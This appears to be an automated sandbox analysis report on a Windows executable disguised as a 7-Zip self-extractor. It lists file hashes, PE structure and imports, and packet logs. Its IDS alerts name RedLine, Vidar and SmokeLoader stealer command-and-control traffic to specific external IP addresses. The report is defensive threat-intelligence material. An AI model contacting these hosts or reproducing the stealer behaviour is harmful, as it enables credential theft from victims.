                                                                                                                          SHA-256:2498188B617B80FE88E8E3E846FA13348AB80F2496A534349FF7055C692AF8B0
                                                                                                                          SHA-512:54DFE4F307E72047A0D4589296539547B3D8F4834B9782F7EED063588022E4CC83F6565C595C7451B628DEA35364938515403966666180AEBBC0BCDCF13E1DA1
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...l...............................................................................................................................................................................................................................................................................................................................................r..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Windows\appcompat\Programs\Amcache.hve.LOG1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):12288
                                                                                                                          Entropy (8bit):3.356841956351765
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:F8HAx1AMxwvw18KwPYN5FSEHR+f2TnpHOUG6A7fFa5:ug/5J+f27pHOUGn7f
                                                                                                                          MD5:E3AC4EE87765EE579BF396AB11B6D239
                                                                                                                          SHA1:AC7D34DB8A2B9E0EB4703388A41CC6DB763BFBAB
                                                                                                                          SHA-256:E73B4758B0F8611E1C6D3D325C41C9047AC759B0C35295662168197EFB30E47F
                                                                                                                          SHA-512:CE6F0986EB418522D44312F1B9F48D8306443CE4ACD9210743EB385745A13DA2824403392B2BDBB5F704B0BD1EFA04365A262D510FEE077FE3D9D753BD170321
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:regfG...G...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...l...............................................................................................................................................................................................................................................................................................................................................r..HvLE........G............b...^X.a....?.................hbin................p.\..,..........nk,..!...,...... ........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .*..O.`...... ........................... .......Z.......................Root........lf......Root....nk ..P^..................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p.......nk .

                                                                                                                          Static File Info

                                                                                                                          General

                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Entropy (8bit):7.99814764669044
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                          File name:T4IoJqcAwY.exe
                                                                                                                          File size:9083840
                                                                                                                          MD5:a9aea2720aa1e020bf30e7f17463bf2d
                                                                                                                          SHA1:2bb5d89679bc041680932db0757e1a53f2db37e5
                                                                                                                          SHA256:fab5f16b7b7f88aad46914ea2a932c11e376d2c44da5cd33bc16ecb393f084c3
                                                                                                                          SHA512:6a7fb096ccd9d910ad940f18446213a52983c0f625edf055cacd0d7552b393deffa400c37941a564866174c73b2b7738451772b7a769a7a6b7f947415424954d
                                                                                                                          SSDEEP:196608:xkpWldpFTL0iBvNYOLAcNGd8/4PTVc3lARI+HN64mdNoFuDOYky4Q:xkgXpFTL0iBNYndWKVO8xNssQyk
                                                                                                                          TLSH:1B9633B978F1C0F7C4291AB2221677B266FB85640F398A971BD15E0E5DB08D0C27F2D9
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B...]...B...^...B...]...B...]...B...J...B...B...B...J...B...d...B...d...B....6..B.......B..]D...B..Rich.B.........

                                                                                                                          File Icon

                                                                                                                          Icon Hash:8484d4f2b8f47434

                                                                                                                          Static PE Info

                                                                                                                          General

                                                                                                                          Entrypoint:0x41910c
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                          DLL Characteristics:NX_COMPAT
                                                                                                                          Time Stamp:0x5C6ECB00 [Thu Feb 21 16:00:00 2019 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:4
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:4
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:4
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:32569d67dc210c5cb9a759b08da2bdb3

                                                                                                                          Entrypoint Preview

                                                                                                                          Instruction
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          push FFFFFFFFh
                                                                                                                          push 0041C298h
                                                                                                                          push 00419106h
                                                                                                                          mov eax, dword ptr fs:[00000000h]
                                                                                                                          push eax
                                                                                                                          mov dword ptr fs:[00000000h], esp
                                                                                                                          sub esp, 68h
                                                                                                                          push ebx
                                                                                                                          push esi
                                                                                                                          push edi
                                                                                                                          mov dword ptr [ebp-18h], esp
                                                                                                                          xor ebx, ebx
                                                                                                                          mov dword ptr [ebp-04h], ebx
                                                                                                                          push 00000002h
                                                                                                                          call dword ptr [0041B0E8h]
                                                                                                                          pop ecx
                                                                                                                          or dword ptr [004213E4h], FFFFFFFFh
                                                                                                                          or dword ptr [004213E8h], FFFFFFFFh
                                                                                                                          call dword ptr [0041B0ECh]
                                                                                                                          mov ecx, dword ptr [0041F3C8h]
                                                                                                                          mov dword ptr [eax], ecx
                                                                                                                          call dword ptr [0041B0F0h]
                                                                                                                          mov ecx, dword ptr [0041F3C4h]
                                                                                                                          mov dword ptr [eax], ecx
                                                                                                                          mov eax, dword ptr [0041B0F4h]
                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                          mov dword ptr [004213ECh], eax
                                                                                                                          call 00007F20F8C69871h
                                                                                                                          cmp dword ptr [0041F150h], ebx
                                                                                                                          jne 00007F20F8C6975Eh
                                                                                                                          push 00419294h
                                                                                                                          call dword ptr [0041B0F8h]
                                                                                                                          pop ecx
                                                                                                                          call 00007F20F8C69843h
                                                                                                                          push 0041F038h
                                                                                                                          push 0041F034h
                                                                                                                          call 00007F20F8C6982Eh
                                                                                                                          mov eax, dword ptr [0041F3C0h]
                                                                                                                          mov dword ptr [ebp-6Ch], eax
                                                                                                                          lea eax, dword ptr [ebp-6Ch]
                                                                                                                          push eax
                                                                                                                          push dword ptr [0041F3BCh]
                                                                                                                          lea eax, dword ptr [ebp-64h]
                                                                                                                          push eax
                                                                                                                          lea eax, dword ptr [ebp-70h]
                                                                                                                          push eax
                                                                                                                          lea eax, dword ptr [ebp-60h]
                                                                                                                          push eax
                                                                                                                          call dword ptr [0041B100h]
                                                                                                                          push 0041F030h
                                                                                                                          push 0041F000h
                                                                                                                          call 00007F20F8C697FBh

                                                                                                                          Rich Headers

                                                                                                                          Programming Language:
                                                                                                                          • [C++] VS98 (6.0) SP6 build 8804
                                                                                                                          • [ C ] VS2010 SP1 build 40219
                                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                          • [ C ] VS98 (6.0) SP6 build 8804
                                                                                                                          • [ASM] VS2010 SP1 build 40219

                                                                                                                          Data Directories

                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1e1bc0x78.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x230000xab0.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x1b0000x1b0.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                          Sections

                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x10000x197450x19800False0.583438648897DOS executable (COM)6.6301384284IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                          .rdata0x1b0000x3a980x3c00False0.3345703125data4.39318766185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .data0x1f0000x23f00x200False0.369140625data3.30022863793IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                          .sxdata0x220000x40x200False0.02734375data0.0203931352361IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_READ
                                                                                                                          .rsrc0x230000xab00xc00False0.344401041667data3.32928574611IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                          Resources

                                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                                          RT_ICON0x234d00x2e8dataEnglishUnited States
                                                                                                                          RT_ICON0x237b80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                          RT_DIALOG0x239080xb8dataEnglishUnited States
                                                                                                                          RT_STRING0x239c00x60dataEnglishUnited States
                                                                                                                          RT_STRING0x23a200x54dataEnglishUnited States
                                                                                                                          RT_STRING0x23a780x34dataEnglishUnited States
                                                                                                                          RT_GROUP_ICON0x238e00x22dataEnglishUnited States
                                                                                                                          RT_VERSION0x232100x2bcdataEnglishUnited States

                                                                                                                          Imports

                                                                                                                          DLLImport
                                                                                                                          OLEAUT32.dllSysStringLen, SysAllocStringLen, VariantClear
                                                                                                                          USER32.dllDialogBoxParamW, SetWindowLongW, GetWindowLongW, GetDlgItem, LoadStringW, CharUpperW, DestroyWindow, EndDialog, PostMessageW, SetWindowTextW, ShowWindow, MessageBoxW, SendMessageW, LoadIconW, KillTimer, SetTimer
                                                                                                                          SHELL32.dllShellExecuteExW
                                                                                                                          MSVCRT.dll_controlfp, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ?terminate@@YAXXZ, ??1type_info@@UAE@XZ, _except_handler3, _beginthreadex, memset, wcsstr, free, malloc, memcpy, _CxxThrowException, _purecall, memmove, memcmp, wcscmp, __CxxFrameHandler
                                                                                                                          KERNEL32.dllWaitForSingleObject, GetStartupInfoA, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, lstrlenW, lstrcatW, VirtualFree, VirtualAlloc, Sleep, WaitForMultipleObjects, GetFileInformationByHandle, GetStdHandle, GlobalMemoryStatus, GetSystemInfo, GetCurrentProcess, GetProcessAffinityMask, SetEndOfFile, WriteFile, ReadFile, SetFilePointer, GetFileSize, GetFileAttributesW, GetModuleHandleA, FindNextFileW, FindFirstFileW, FindClose, GetCurrentThreadId, GetTickCount, GetCurrentProcessId, GetTempPathW, GetCurrentDirectoryW, SetCurrentDirectoryW, SetLastError, DeleteFileW, CreateDirectoryW, GetModuleHandleW, GetProcAddress, RemoveDirectoryW, SetFileAttributesW, CreateFileW, SetFileTime, GetSystemDirectoryW, FormatMessageW, LocalFree, GetModuleFileNameW, LoadLibraryExW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLastError, GetVersionExW, GetCommandLineW, CreateProcessW, CloseHandle

                                                                                                                          Version Infos

                                                                                                                          DescriptionData
                                                                                                                          LegalCopyrightCopyright (c) 1999-2018 Igor Pavlov
                                                                                                                          InternalName7zS.sfx
                                                                                                                          FileVersion19.00
                                                                                                                          CompanyNameIgor Pavlov
                                                                                                                          ProductName7-Zip
                                                                                                                          ProductVersion19.00
                                                                                                                          FileDescription7z Setup SFX
                                                                                                                          OriginalFilename7zS.sfx.exe
                                                                                                                          Translation0x0409 0x04b0

                                                                                                                          Possible Origin

                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                          EnglishUnited States

                                                                                                                          Network Behavior

                                                                                                                          Snort IDS Alerts

                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                          192.168.2.4185.215.113.7049792121892850286 05/21/22-09:32:10.361605TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4979212189192.168.2.4185.215.113.70
                                                                                                                          116.202.0.187192.168.2.480498772035911 05/21/22-09:33:10.268775TCP2035911ET TROJAN Vidar/Arkei/Megumin Stealer Keywords Retrieved8049877116.202.0.187192.168.2.4
                                                                                                                          192.168.2.4194.36.177.10649835135112850027 05/21/22-09:32:49.349146TCP2850027ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init4983513511192.168.2.4194.36.177.106
                                                                                                                          192.168.2.4206.81.21.19449889802834928 05/21/22-09:33:25.141446TCP2834928ETPRO MALWARE Observed Suspicious UA (AdvancedInstaller)4988980192.168.2.4206.81.21.194
                                                                                                                          192.168.2.48.8.8.853989532023883 05/21/22-09:31:49.982019UDP2023883ET DNS Query to a *.top domain - Likely Hostile5398953192.168.2.48.8.8.8
                                                                                                                          192.168.2.4194.36.177.10649835135112850286 05/21/22-09:33:03.918933TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4983513511192.168.2.4194.36.177.106
                                                                                                                          194.36.177.106192.168.2.413511498352850353 05/21/22-09:32:49.444189TCP2850353ETPRO MALWARE Redline Stealer TCP CnC - Id1Response1351149835194.36.177.106192.168.2.4
                                                                                                                          192.168.2.48.8.8.850661532016778 05/21/22-09:32:45.268161UDP2016778ET DNS Query to a *.pw domain - Likely Hostile5066153192.168.2.48.8.8.8
                                                                                                                          192.168.2.48.8.8.859510532027758 05/21/22-09:32:46.126333UDP2027758ET DNS Query for .cc TLD5951053192.168.2.48.8.8.8
                                                                                                                          192.168.2.48.8.8.849320532023883 05/21/22-09:32:46.562882UDP2023883ET DNS Query to a *.top domain - Likely Hostile4932053192.168.2.48.8.8.8
                                                                                                                          192.168.2.4185.215.113.7049792121892850027 05/21/22-09:32:10.063096TCP2850027ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init4979212189192.168.2.4185.215.113.70
                                                                                                                          194.36.177.106192.168.2.413511498302850353 05/21/22-09:32:47.473603TCP2850353ETPRO MALWARE Redline Stealer TCP CnC - Id1Response1351149830194.36.177.106192.168.2.4
                                                                                                                          192.168.2.491.189.114.2749820802850316 05/21/22-09:32:45.051524TCP2850316ETPRO MALWARE Observed SmokeLoader CnC Activity4982080192.168.2.491.189.114.27
                                                                                                                          192.168.2.4193.109.246.6249836802850316 05/21/22-09:32:49.754507TCP2850316ETPRO MALWARE Observed SmokeLoader CnC Activity4983680192.168.2.4193.109.246.62
                                                                                                                          192.168.2.434.88.62.13549776802839343 05/21/22-09:31:23.607844TCP2839343ETPRO MALWARE InnoDownloadPlugin User-Agent Observed4977680192.168.2.434.88.62.135
                                                                                                                          185.215.113.70192.168.2.412189497922850353 05/21/22-09:32:10.294870TCP2850353ETPRO MALWARE Redline Stealer TCP CnC - Id1Response1218949792185.215.113.70192.168.2.4
                                                                                                                          192.168.2.4194.36.177.10649830135112850027 05/21/22-09:32:47.315523TCP2850027ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init4983013511192.168.2.4194.36.177.106
                                                                                                                          192.168.2.4151.115.10.149765802839343 05/21/22-09:31:05.322496TCP2839343ETPRO MALWARE InnoDownloadPlugin User-Agent Observed4976580192.168.2.4151.115.10.1
                                                                                                                          192.168.2.4194.36.177.10649830135112850286 05/21/22-09:33:01.337176TCP2850286ETPRO TROJAN Redline Stealer TCP CnC Activity4983013511192.168.2.4194.36.177.106
                                                                                                                          192.168.2.441.41.255.23549810802850316 05/21/22-09:32:42.669427TCP2850316ETPRO MALWARE Observed SmokeLoader CnC Activity4981080192.168.2.441.41.255.235

                                                                                                                          Network Port Distribution

                                                                                                                          TCP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          May 21, 2022 09:30:50.529062986 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:50.529114008 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:50.529222965 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:50.536350965 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:50.536386967 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:50.621196985 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:50.621345043 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:50.667813063 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:50.667875051 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:50.668457031 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:50.772855043 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:54.908564091 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:54.952539921 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.395157099 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.395276070 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.395363092 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.395382881 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.395407915 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.395467043 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.395493984 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.395582914 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.395648956 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.395664930 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.395741940 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.395818949 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.395893097 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.395956039 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.395979881 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.396003008 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.396019936 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.396069050 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.613843918 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.614068031 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.614139080 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.614161968 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.614191055 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.614255905 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.614289999 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.614306927 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.614397049 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.614403009 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.614423990 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.614538908 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.614559889 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.614577055 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.614646912 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.614662886 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.614727974 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.614797115 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.614813089 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.617815018 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.617906094 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.617914915 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.617940903 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.617999077 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.618020058 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.618143082 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.618206978 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.618216991 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.618236065 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.618295908 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.618313074 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.663897038 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.663933039 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.773286104 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.830437899 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.830564976 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.830626011 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.830638885 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.830667973 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.830723047 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.830764055 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.830781937 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.830799103 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.830840111 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.830857992 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.830877066 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.830895901 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.830934048 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.830954075 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.830967903 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.832235098 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.832309961 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.832343102 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.832362890 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.832382917 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.834928036 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.835011959 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.835016012 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.835024118 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.835078001 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.835087061 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.835117102 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.835124016 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.835185051 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.835203886 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.835315943 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.835372925 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.835390091 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.835444927 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.835494995 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.835505009 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.835535049 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.835575104 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.836250067 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.836325884 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.836342096 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.836409092 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.836497068 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.836576939 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.836585999 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.836606979 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.836653948 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.836687088 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:55.838099957 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:55.838191986 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:56.049593925 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:56.049707890 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:56.049726963 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:56.049756050 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:56.049796104 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:56.049825907 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:56.049879074 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:56.049901009 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:56.050925016 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:56.051000118 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:56.051000118 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:56.051023006 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:56.051080942 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:56.052179098 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:56.052251101 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:56.052262068 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:56.052344084 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:56.052412033 CEST49758443192.168.2.4172.67.188.70
                                                                                                                          May 21, 2022 09:30:56.052813053 CEST44349758172.67.188.70192.168.2.4
                                                                                                                          May 21, 2022 09:30:56.052895069 CEST49758443192.168.2.4172.67.188.70
